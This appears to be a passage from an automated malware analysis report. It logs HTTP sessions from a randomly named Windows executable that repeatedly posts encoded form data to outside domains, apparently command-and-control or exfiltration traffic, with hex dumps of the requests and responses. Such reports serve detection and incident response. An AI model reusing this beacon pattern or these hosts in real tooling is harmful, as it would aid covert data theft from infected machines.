                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.649738185.253.212.22803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:50.479813099 CEST495OUTGET /xf32/?FNPd=C1mnXsnvmQ2srgCAP1LYR8UCiu5rr29LvVkLxlUVxlF6UozvjyxPjaNreXZ1i0YG7AgmeP0abVbXfNSSITNtMXyNs4HZedQg/L+kUEn9BLsW+ROjsB5HlVbKq/g7YxphTM4QsIM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.brzuszkiewicz.pl
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:20:51.161376953 CEST496INHTTP/1.1 302 Found
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:20:51 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: PHPSESSID=9b9dac8365dca5c281b13f492d792d16; path=/; HttpOnly
                                  Set-Cookie: locale=en_US; expires=Sun, 21-May-2034 13:20:51 GMT; Max-Age=315360000; path=/
                                  Location: https://t2837.am-track.pl/redir.php?panel=Market_Listing&params=id%3D3940392%26utm_source%3Dmarket_redirect&type=listing&id=3940392&medium=direct:direct
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  33192.168.2.64973987.236.16.214803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:01.493554115 CEST754OUTPOST /pczf/ HTTP/1.1
                                  Host: www.novosti-dubai.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.novosti-dubai.ru
                                  Referer: http://www.novosti-dubai.ru/pczf/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 69 74 4a 6f 76 32 76 65 48 6d 4c 45 41 62 54 73 32 44 57 58 50 79 6e 50 45 63 34 6e 66 71 63 77 2f 64 37 74 69 4e 66 4c 42 54 6d 57 4e 6e 65 32 76 74 42 54 48 2f 41 7a 77 72 31 74 48 6c 72 30 64 77 74 38 45 33 33 35 66 6d 4d 78 44 2f 4c 42 58 55 4b 55 58 57 63 7a 68 6d 4c 4a 36 42 68 6e 61 77 6e 45 66 77 73 4d 52 4a 35 38 46 37 35 6d 4f 4f 42 4c 52 62 32 59 79 30 65 4a 7a 48 6e 73 70 4c 6b 30 69 79 64 47 65 43 7a 45 68 4a 42 55 69 36 59 76 33 57 4d 50 57 43 62 44 6e 49 58 78 66 64 41 2b 57 6c 36 42 4f 66 63 71 50 42 43 30 30 48 69 62 4a 7a 44 63 6f 41 59 46 53 4d 6f 32 59 31 56 79 50 6f 43 32 4a 50 6f 54
                                  Data Ascii: FNPd=itJov2veHmLEAbTs2DWXPynPEc4nfqcw/d7tiNfLBTmWNne2vtBTH/Azwr1tHlr0dwt8E335fmMxD/LBXUKUXWczhmLJ6BhnawnEfwsMRJ58F75mOOBLRb2Yy0eJzHnspLk0iydGeCzEhJBUi6Yv3WMPWCbDnIXxfdA+Wl6BOfcqPBC00HibJzDcoAYFSMo2Y1VyPoC2JPoT
                                  May 23, 2024 15:21:02.944266081 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  X-Powered-By: PHP/8.3.2
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/"
                                  Content-Encoding: gzip
                                  Data Raw: 33 30 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 8f e3 46 92 e0 e7 2e 60 fe 43 5a 46 bb 4b b6 28 91 d4 b3 aa ba ca eb 27 c6 c0 b8 c7 b0 3d 33 3b 70 37 04 8a 4c 49 ec a6 44 9a a4 4a 55 2e 17 b0 3b 73 b7 f7 e1 16 b7 38 60 bf dd 87 c5 fd 03 ef 60 06 f3 ba 99 fb 0b d5 ff e8 22 22 33 c9 24 45 3d aa 4a 65 cf e2 b6 1f 55 52 66 64 44 64 64 64 64 e4 2b f2 e9 1b 1f fe f4 83 2f 7f f9 d9 47 6c 9a ce 82 b3 83 a7 f8 8b 05 ce 7c 72 5a 8b 17 c6 e7 3f ab 61 1a 77 bc b3 83 47 4f 67 3c 75 98 3b 75 e2 84 a7 a7 b5 9f 7d f9 b1 31 a8 61 7a e0 cf 5f b1 98 07 a7 b5 28 0e c7 7e c0 6b 6c 1a f3 f1 69 6d 9a a6 51 72 dc 6a 4d 66 d1 a4 19 c6 93 d6 c5 78 de b2 ac 72 21 7f 3e 19 39 ee 2b bd 14 14 9a 87 e7 61 92 fa 86 b7 18 39 7e 33 5e b4 2e 66 41 1c b9 cd 68 1a 01 02 c0 90 fa 69 c0 cf 6e fe f7 eb 5f bd fe 87 9b ef 6e fe 72 f3 87 d7 ff 74 f3 1d 83 0f bf c3 1f df dd fc f1 e6 b7 37 bf c3 4f ec ad 37 07 b6 65 9f b0 9b 7f bb f9 eb eb 7f bc f9 33 24 ff 16 0b 20 e4 77 37 7f 02 0c bf 86 df 7f 7e fd cf 37 7f 79 fd df 45 f1 bf de fc [TRUNCATED]
                                  Data Ascii: 308d}kF.`CZFK('=3;p7LIDJU.;s8``""3$E=JeURfdDdddd+/Gl|rZ?awGOg<u;u}1az_(~klimQrjMfxr!>9+a9~3^.fAhin_nrt7O7e3$ w7~7yEa__!z 1wfI4ypyzds_4<A.'F;}"d9IOn8+9AB(|Ip-daNk{+v^ sU[h7M0MH*$I/L9O0;}QN|iIw(`-OVK4g6O0"m|Bo q8cn$~6\YvvJ!P,<=~Xzc{2+HiJ^?0<*$]#N6W0~;44&|cPb:hfm=Zi8Q-07ZI.!SvvOFa_$G'#:^<s~
                                  May 23, 2024 15:21:02.945076942 CEST1236INData Raw: 42 b2 f6 b8 1b c6 d4 4b 44 62 e4 78 1e d8 d8 63 d7 09 dc c3 66 af d7 e7 33 f6 0e b3 a3 8b 3a a3 24 ab d9 6e b7 b3 b4 13 34 28 46 e2 7f c3 8f ad a6 65 77 f9 ec 3a e7 1a 6b 36 1c 0a de af 72 56 33 26 b5 8a 54 b1 72 5d 29 e9 49 10 8e 9c 60 27 11 8f
                                  Data Ascii: BKDbxcf3:$n4(Few:k6rV3&Tr])I`'B00BJ7MsR^:s\_Mg4jO9O5L@wIWg8wlsW"@xwZ2lc,~2|NRsGMM3BQF&:;j5m
                                  May 23, 2024 15:21:02.947685957 CEST1236INData Raw: 69 cb 5e 41 be 9c 95 9b 43 7d 07 ac 82 ee ce fb 10 bb e8 61 c5 f6 c1 bd 58 da 85 c0 ae fd 71 dd c6 c2 fd 18 bc 0d a5 9d 6d 95 be ef b0 4f f6 2a d0 57 e9 d8 f6 ed 88 fb e9 d9 76 fc 55 63 68 d5 2e c5 bd f8 a8 c4 58 e9 0f 94 f7 17 ee 45 76 15 dd 5a
                                  Data Ascii: i^AC}aXqmO*WvUch.XEvZjaM:Q76h*h7E2?mkW*~iwE*-; r.ve:$z<SZQz]sJA59E z[lOG^i%HT
                                  May 23, 2024 15:21:02.947694063 CEST1236INData Raw: 55 44 54 04 d9 56 dc ef ab db 68 33 8a 6d 7d 26 07 7d b8 0e f3 37 a1 66 5a f6 3a 35 2b 88 6d ff 4d 73 db 0a 55 6c a7 42 85 ce a1 32 61 5c 5c 0d d0 bb d0 cb 6c 73 55 d4 ea dc 1d ae 01 45 dd 78 90 a1 a6 ec e4 00 d7 81 3f 4a 5a 1e 3f f7 8b d2 27 f7
                                  Data Ascii: UDTVh3m}&}7fZ:5+mMsUlB2a\\lsUEx?JZ?'@J3D~BMHZ"EK8a;zFySH8HJ"/pNg4Dy~?|GdzJ07y\|BPjc'`4;?PdR^T< /R5KnuVls3
                                  May 23, 2024 15:21:02.952892065 CEST1236INData Raw: 0a 37 7d a7 16 5d d4 32 bb b0 19 fd 3b b5 21 46 54 89 60 c2 bf 91 52 66 5b b6 52 cc 41 e4 2c 00 60 6a b4 84 5a 2b d4 fe 9a b9 78 b4 4e b9 1c 8f 1e 81 93 93 84 50 2c 08 27 87 b5 8f 1d 3f 58 c4 9c 39 29 43 cf 18 7c 13 16 8e a5 eb 7c 5c 43 91 0a 0b
                                  Data Ascii: 7}]2;!FT`Rf[RA,`jZ+xNP,'?X9)C||\Cy-kb}*Sfk.!S>:<<lIRX<Da;6L1s8S{`s)1M+8)$M,H(f9ByR@EQa@B
                                  May 23, 2024 15:21:02.957261086 CEST1236INData Raw: 46 03 b6 c9 5c 15 0d 99 1a 29 ba 22 4b 37 c1 85 71 b2 22 2b b3 cd 1a 40 66 6d 0b 16 aa 2a 2f 2b ad 41 64 c6 7f 33 63 da 33 1d b2 17 ac cb 57 44 74 a8 7c 40 a8 a6 92 e7 af 21 53 01 50 a4 73 5d 3d 09 26 f9 63 7b 7e 45 93 8a 73 d7 c0 d5 73 91 fd 82
                                  Data Ascii: F\)"K7q"+@fm*/+Ad3c3WDt|@!SPs]=&c{~EssfYF,s/c?9l0,}D%km:zd>8Z@2!mPp7_Amv?o~oo{+zgr^ /sDd?-$
                                  May 23, 2024 15:21:02.957269907 CEST1236INData Raw: 18 61 6a 38 1e bb ce fc 1c 03 f6 fa 1e c7 e3 26 72 c5 7f 35 83 ee 72 a4 4c 1d 02 92 5b 56 92 2a c6 ee a1 bb 93 e2 4a 1c 93 9f 71 9b c8 e8 37 7b 0c 57 26 b3 eb 24 e2 5c c4 2e 77 25 3d 63 1c e0 79 1e a8 bc 7f 51 3b 6b b5 d8 c7 e2 3b 34 de 45 33 3b
                                  Data Ascii: aj8&r5rL[V*Jq7{W&$\.w%=cyQ;k;4E3;&Ggz|OB.=g[dv96(cHJ(Jfd@?K8:vk$1qShM535K?@)sIYdGIGsEN4Ij .G
                                  May 23, 2024 15:21:02.961905956 CEST1236INData Raw: 71 0f ca a7 f1 82 6f 64 f2 17 1b 48 15 21 36 31 8c bd 0a 50 3c c1 f5 1d f0 0c bc 27 27 e2 6a 62 2e d4 c2 ca ce 93 d2 ca ce 13 04 c9 a2 2f 30 15 7e 01 af 91 ba fa 35 4f 5c 2b 6b 52 83 3f 83 7e 4f bc 60 be db 8c 39 d9 a2 c3 d6 ca 4a 59 ab c1 9e 14
                                  Data Ascii: qodH!61P<''jb./0~5O\+kR?~O`9JYD=A Et]?D8LbM81a>[,$Pp6R,O+q{}n\WU+NKe3)*.,!PUc~.b')mm<>^
                                  May 23, 2024 15:21:02.961913109 CEST1236INData Raw: 8c 42 bc 92 db 36 4d ad 82 c2 dd 1b e2 15 82 a1 d8 64 cd 84 8e 6f 17 0e c5 db 85 79 a3 ba 78 f4 a8 ba 7c 24 9a 07 5b 17 2d 05 76 01 fc cd 0e 3f 4a dc 3a 0e 61 53 27 06 84 23 c8 f8 02 3f 32 70 7f 3e 86 e9 c2 28 0c 09 a3 3f 1f fa d4 71 fd 39 f3 51
                                  Data Ascii: B6Mdoyx|$[-v?J:aS'#?2p>(?q9Qo%'3DtOi CDB5c[C'-h}s7QKyBq6g,+{&]5v**0O=+x>&Y[W*zNM%g"|Y
                                  May 23, 2024 15:21:02.966840029 CEST1236INData Raw: 98 05 d6 cf b6 e9 a6 5c 1f 5c 63 da 44 26 7c e0 25 13 b7 e1 97 5c 35 86 49 44 cc a5 24 c4 04 47 b8 2e c2 1d 5f 0b 31 0c a3 7c f1 9d a6 44 68 cd e5 c4 0b 67 12 38 e9 c2 a5 7c ed 3e a2 72 cc 02 f0 da f4 69 54 22 e1 84 e3 27 50 a6 d3 98 73 d0 da 8b
                                  Data Ascii: \\cD&|%\5ID$G._1|Dhg8|>riT"'PsgBo:`8weK2~aqrrcpzpPU<\^H9x`y^<aL/pQZ"~:}byPNI1t."zT><=b;dKHx0yEv'G\G'
                                  May 23, 2024 15:21:02.966850042 CEST497INData Raw: 9d fd be 59 16 3d 57 fe 7a 5f 2c 34 af e7 58 19 33 01 f7 bd 33 2b 75 40 74 87 0f f4 de 50 2d df 52 af fc 81 d8 55 f1 12 a2 f5 9c 6a 7d f8 07 62 52 6c 0a 7e 21 82 4d 6e 50 00 11 7d 48 05 a5 fc 01 3a 98 38 08 26 19 7d 3f 9d 6f 10 aa 0c 1d 29 79 c5
                                  Data Ascii: Y=Wz_,4X33+u@tP-RUj}bRl~!MnP}H:8&}?o)yA)-]ar7H\3EV85x#mf<~u)MT^":&$u0Sm|Cp1hc,{%Q;uvsAzS1O]_#W


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  34192.168.2.64974087.236.16.214803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:04.025677919 CEST778OUTPOST /pczf/ HTTP/1.1
                                  Host: www.novosti-dubai.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.novosti-dubai.ru
                                  Referer: http://www.novosti-dubai.ru/pczf/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 69 74 4a 6f 76 32 76 65 48 6d 4c 45 42 2b 62 73 30 67 75 58 49 53 6e 4d 4c 38 34 6e 55 4b 63 30 2f 64 6e 74 69 50 79 4d 42 46 57 57 44 6e 75 32 39 6f 74 54 55 50 41 7a 6b 37 31 6b 4b 46 72 39 64 77 6f 63 45 33 4c 35 66 6e 6f 78 44 2b 37 42 58 6e 53 58 46 32 63 78 73 47 4c 4c 31 68 68 6e 61 77 6e 45 66 77 34 6d 52 4a 68 38 45 4c 70 6d 50 76 42 49 63 37 32 5a 37 55 65 4a 33 48 6e 6f 70 4c 6c 5a 69 7a 52 6f 65 41 37 45 68 49 78 55 73 49 67 75 35 6d 4d 4a 62 69 61 6b 70 61 47 65 5a 4f 64 45 59 6d 57 58 64 73 73 4d 4f 33 44 75 6f 30 69 34 62 6a 6a 65 6f 43 41 33 53 73 6f 63 61 31 74 79 64 2f 4f 52 47 37 4e 77 37 4b 43 78 36 54 45 65 6f 70 65 34 42 52 72 31 56 63 43 57 5a 51 3d 3d
                                  Data Ascii: FNPd=itJov2veHmLEB+bs0guXISnML84nUKc0/dntiPyMBFWWDnu29otTUPAzk71kKFr9dwocE3L5fnoxD+7BXnSXF2cxsGLL1hhnawnEfw4mRJh8ELpmPvBIc72Z7UeJ3HnopLlZizRoeA7EhIxUsIgu5mMJbiakpaGeZOdEYmWXdssMO3Duo0i4bjjeoCA3Ssoca1tyd/ORG7Nw7KCx6TEeope4BRr1VcCWZQ==
                                  May 23, 2024 15:21:05.146579981 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:04 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  X-Powered-By: PHP/8.3.2
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/"
                                  Content-Encoding: gzip
                                  Data Raw: 33 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 8f e3 46 92 e0 e7 2e 60 fe 43 5a 46 bb 4b b6 28 91 d4 b3 aa ba ca eb 27 c6 c0 b8 c7 b0 3d 33 3b 70 37 04 8a 4c 49 ec a6 44 9a a4 4a 55 2e 17 b0 3b 73 b7 f7 e1 16 b7 38 60 bf dd 87 c5 fd 03 ef 60 06 f3 ba 99 fb 0b d5 ff e8 22 22 33 c9 24 45 3d aa 4a 65 cf e2 b6 1f 55 52 66 64 44 64 64 64 64 e4 2b f2 e9 1b 1f fe f4 83 2f 7f f9 d9 47 6c 9a ce 82 b3 83 a7 f8 8b 05 ce 7c 72 5a 8b 17 c6 e7 3f ab 61 1a 77 bc b3 83 47 4f 67 3c 75 98 3b 75 e2 84 a7 a7 b5 9f 7d f9 b1 31 a8 61 7a e0 cf 5f b1 98 07 a7 b5 28 0e c7 7e c0 6b 6c 1a f3 f1 69 6d 9a a6 51 72 dc 6a 4d 66 d1 a4 19 c6 93 d6 c5 78 de b2 ac 72 21 7f 3e 19 39 ee 2b bd 14 14 9a 87 e7 61 92 fa 86 b7 18 39 7e 33 5e b4 2e 66 41 1c b9 cd 68 1a 01 02 c0 90 fa 69 c0 cf 6e fe f7 eb 5f bd fe 87 9b ef 6e fe 72 f3 87 d7 ff 74 f3 1d 83 0f bf c3 1f df dd fc f1 e6 b7 37 bf c3 4f ec ad 37 07 b6 65 9f b0 9b 7f bb f9 eb eb 7f bc f9 33 24 ff 16 0b 20 e4 77 37 7f 02 0c bf 86 df 7f 7e fd cf 37 7f 79 fd df 45 f1 bf de fc [TRUNCATED]
                                  Data Ascii: 308c}kF.`CZFK('=3;p7LIDJU.;s8``""3$E=JeURfdDdddd+/Gl|rZ?awGOg<u;u}1az_(~klimQrjMfxr!>9+a9~3^.fAhin_nrt7O7e3$ w7~7yEa__!z 1wfI4ypyzds_4<A.'F;}"d9IOn8+9AB(|Ip-daNk{+v^ sU[h7M0MH*$I/L9O0;}QN|iIw(`-OVK4g6O0"m|Bo q8cn$~6\YvvJ!P,<=~Xzc{2+HiJ^?0<*$]#N6W0~;44&|cPb:hfm=Zi8Q-07ZI.!SvvOFa_$G'#:^<s~
                                  May 23, 2024 15:21:05.147507906 CEST224INData Raw: 42 b2 f6 b8 1b c6 d4 4b 44 62 e4 78 1e d8 d8 63 d7 09 dc c3 66 af d7 e7 33 f6 0e b3 a3 8b 3a a3 24 ab d9 6e b7 b3 b4 13 34 28 46 e2 7f c3 8f ad a6 65 77 f9 ec 3a e7 1a 6b 36 1c 0a de af 72 56 33 26 b5 8a 54 b1 72 5d 29 e9 49 10 8e 9c 60 27 11 8f
                                  Data Ascii: BKDbxcf3:$n4(Few:k6rV3&Tr])I`'B00BJ7MsR^:s\_Mg4jO9O5L@wIWg8wlsW"@xwZ2lc,~2|NRsGMM3B
                                  May 23, 2024 15:21:05.149630070 CEST1236INData Raw: 51 c2 46 ee 07 dc b3 c6 ee 26 dc 3a b4 d9 3b 6a f3 35 6d 22 a0 a3 45 1c 05 08 7a 34 ea 5a bc 5c c7 09 f6 11 b0 34 2b b8 0d e8 8e 45 04 a8 6a 4e 9c 95 38 b4 da 5d 8f 4f 1a 31 38 24 87 bd 86 d5 e9 37 6c bb df b0 ea cc 7c 8c 89 87 56 b7 db 18 58 90
                                  Data Ascii: QF&:;j5m"Ez4Z\4+EjN8]O18$7l|VX3ib\Omc679hXms+@&1]x6\mXL+d.kl600\fM\"U#!:;tQwy7tDMl#~hu5MTg.lAG
                                  May 23, 2024 15:21:05.151870966 CEST1236INData Raw: 11 a6 05 c9 5b b4 6c 4f 47 5e e4 69 25 48 ea 9d 54 9f 94 59 86 21 1d 2d 8b dd ec 0c d6 e6 a3 58 5a 01 36 0e e3 19 6b e2 4f 23 0e 97 ac 19 f3 af 17 3e 8c 53 ec 8a 9d fb 89 3f f2 03 3f bd 3c 16 9f 03 7e c2 74 16 d6 1f 5e 7b 99 0c 81 02 c8 9d c7 c3
                                  Data Ascii: [lOG^i%HTY!-XZ6kO#>S??<~t^{q<,'-OLO6-pm?QI;-`Ir\4rn@II?|QOMtwDWT!U{UJ`9|@=0zYI)z
                                  May 23, 2024 15:21:05.151881933 CEST1236INData Raw: e0 89 fa 18 6e c4 75 a0 9a 56 d3 6c b0 99 73 e1 cf 16 33 3d 69 01 1d 87 be 3b 23 48 82 e1 4e 12 14 54 e7 a1 6a 23 71 40 42 3f 67 91 ed 95 4c c0 43 05 d7 e6 8a 85 78 89 16 8f 56 58 fa 09 1a 76 ad 8e 57 3c 6d 65 f8 0e 1e c9 d3 1e 9a a6 82 d3 5b 3b
                                  Data Ascii: nuVls3=i;#HNTj#q@B?gLCxVXvW<me[;k=bRbbe!-`K|.q;./>{Zg0'e/`^L3C1 Y5z_"7<[M7"`y40?8Y`K?[bclM9@)k
                                  May 23, 2024 15:21:05.151896954 CEST1236INData Raw: a6 61 15 9b c5 fc ca 9a 94 40 b6 d5 c7 0d 42 bc b1 a0 e5 5f 1f 1c 1c 34 97 d3 91 28 0b 76 9d be 64 f5 a6 62 90 e6 19 38 cb 02 e3 34 17 77 44 92 05 94 80 ff d0 61 16 d4 05 c4 44 15 25 0b ba 60 4a cc f7 45 7c 4c 8b d7 88 5e 5d b2 b0 15 ea 83 83 bf
                                  Data Ascii: a@B_4(vdb84wDaD%`JE|L^]%v",,T4%.0v}Ui@FbP=jtn[5MDpBgM[Wql)n)m\K6.JUe5@fzi?Ra-Da
                                  May 23, 2024 15:21:05.156491041 CEST1236INData Raw: 73 44 7f 64 3f ff ec 19 bb f9 2d 24 fc 0b bb f9 0d 20 f9 dd eb ff ca 5e ff 1a 1f 27 7a fd 0f 00 fc 47 7a a6 e8 37 ec ed d6 8f 0e 9a 33 3c d3 33 4f 87 36 bb fa d1 01 83 3f c5 b0 ce 22 4d 44 9e c0 ee 25 be eb fd d3 ea e4 e9 59 9f 35 1f 67 90 32 f4
                                  Data Ascii: sDd?-$ ^'zGz73<3O6?"MD%Y5g22[#YH%G?:j0jZG#a{6QKX*x]kL'um@^[_1H+bQ1O[%5_v{X9s%1tb"jhPK4E&
                                  May 23, 2024 15:21:05.158360958 CEST552INData Raw: 99 0d 6a bc 20 9c d0 b5 b0 a7 ce 96 db 2e b5 8c 98 47 85 18 06 63 41 81 13 06 79 c3 2f 9c 09 bd 7b ea cf 26 c2 d6 9d d6 ba a6 59 93 8e c6 69 cd ee 9a bb df 54 2c af 5b 22 25 c3 16 77 54 24 33 4e 9a 3a ee 94 82 33 63 cf a5 1b 3e f4 a9 06 46 39 c5
                                  Data Ascii: j .GcAy/{&YiT,["%wT$3N:3c>F9Sd"Nk&o/!@\~K`8&^~;79gl;0:m>T~li~5~z^1@#J-QjM_a^Jv3>1m]Km:Zf?1*_W/
                                  May 23, 2024 15:21:05.160121918 CEST1236INData Raw: a7 fa e4 ce 31 64 b7 55 16 35 69 ed ec 59 98 b2 8f b1 01 40 42 6d 92 a0 12 54 d1 2e 13 26 49 5c a2 b2 ce be 9c fa 09 83 7f 09 98 d8 e5 d4 49 19 9f c1 7c 06 df 45 01 13 d6 80 9c f9 5b 71 f2 f5 22 3c 49 99 9f be 0b a8 2d 2a 19 9d 7d 92 b2 20 0c 5f
                                  Data Ascii: 1dU5iY@BmT.&I\I|E[q"<I-*} _%,_q6)`K'/*JwMs9:L=|r2)(sR~<#KBlf}/k;Rg{`ir,<ZJiNk_Uxb,4YAW2ZUPc!fdD
                                  May 23, 2024 15:21:05.160130978 CEST1236INData Raw: 13 e2 17 9f c5 84 52 5a c6 c2 99 7c 5f 06 77 4b 54 db 95 6e b2 3e 84 72 55 8f fa de a3 d7 7a 7e 92 b6 56 de 1b 2d 46 5a 95 81 6b 31 de 4c 11 6c 78 27 5b a2 e6 27 e2 10 c4 f6 78 c8 04 9d 05 5a 20 13 82 f1 47 40 bf 42 70 63 b8 f2 06 15 a0 33 18 f5
                                  Data Ascii: RZ|_wKTn>rUz~V-FZk1Llx'['xZ G@Bpc372xdszc#v]aj&9}~a#>!10H=>3"%G=2^iX`|-0C qDCYa46b&FHJy7v.%XF!>S!2e
                                  May 23, 2024 15:21:05.160142899 CEST1236INData Raw: 06 fe 80 22 04 f5 bc 85 29 a8 5f 84 46 a6 e1 97 eb 06 1d 1d dc 3e e1 51 f6 6a 2b 20 42 89 99 11 d8 14 11 e6 49 71 5e 74 0b 87 c2 85 1c f2 8b 08 da 13 fd f4 5e 3e bf 58 0b d3 2f 60 d6 32 da e6 b6 17 b1 34 5b 43 1b fe 89 da bd 91 4e bb 54 d6 7c 7e
                                  Data Ascii: ")_F>Qj+ BIq^t^>X/`24[CNT|~ZQ7F=ej/`ZFK?+/`^D,mC]H,*JsyBD\|.v=y|Om6@ah8&Gl<7^6-ZC%u]u8kD


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  35192.168.2.64974187.236.16.214803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:06.563597918 CEST1791OUTPOST /pczf/ HTTP/1.1
                                  Host: www.novosti-dubai.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.novosti-dubai.ru
                                  Referer: http://www.novosti-dubai.ru/pczf/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 69 74 4a 6f 76 32 76 65 48 6d 4c 45 42 2b 62 73 30 67 75 58 49 53 6e 4d 4c 38 34 6e 55 4b 63 30 2f 64 6e 74 69 50 79 4d 42 47 32 57 44 56 6d 32 2b 50 5a 54 46 2f 41 7a 37 4c 31 70 4b 46 71 76 64 30 38 44 45 33 48 70 66 6c 67 78 41 59 48 42 56 53 2b 58 4f 32 63 78 6c 6d 4c 4b 36 42 68 79 61 77 33 41 66 77 6f 6d 52 4a 68 38 45 4e 74 6d 49 2b 42 49 65 37 32 59 79 30 65 56 7a 48 6e 51 70 4c 4e 6e 69 7a 56 57 65 51 62 45 67 6f 68 55 75 39 4d 75 37 47 4d 4c 61 69 61 38 70 61 4b 42 5a 4f 42 79 59 6e 69 39 64 76 77 4d 4f 43 79 6f 73 46 75 6c 5a 46 33 4f 33 43 77 42 53 4a 4a 69 43 55 4a 54 61 4a 53 78 4a 61 70 4e 33 4f 47 59 78 68 46 64 6e 50 75 45 48 47 71 5a 57 4f 54 74 47 58 4f 46 35 68 45 70 64 61 47 59 61 55 46 6a 37 31 41 35 43 51 77 37 70 62 6f 76 56 39 44 76 79 6e 63 6f 79 39 74 49 70 2f 64 6d 4d 46 38 72 6e 72 76 61 5a 43 4a 65 7a 38 42 57 58 37 37 61 34 72 77 57 46 49 63 72 67 4e 55 50 76 34 77 59 4e 76 73 66 64 4d 39 61 37 53 72 71 72 4f 47 61 55 6c 57 53 65 62 2b 39 4c 68 55 43 65 [TRUNCATED]
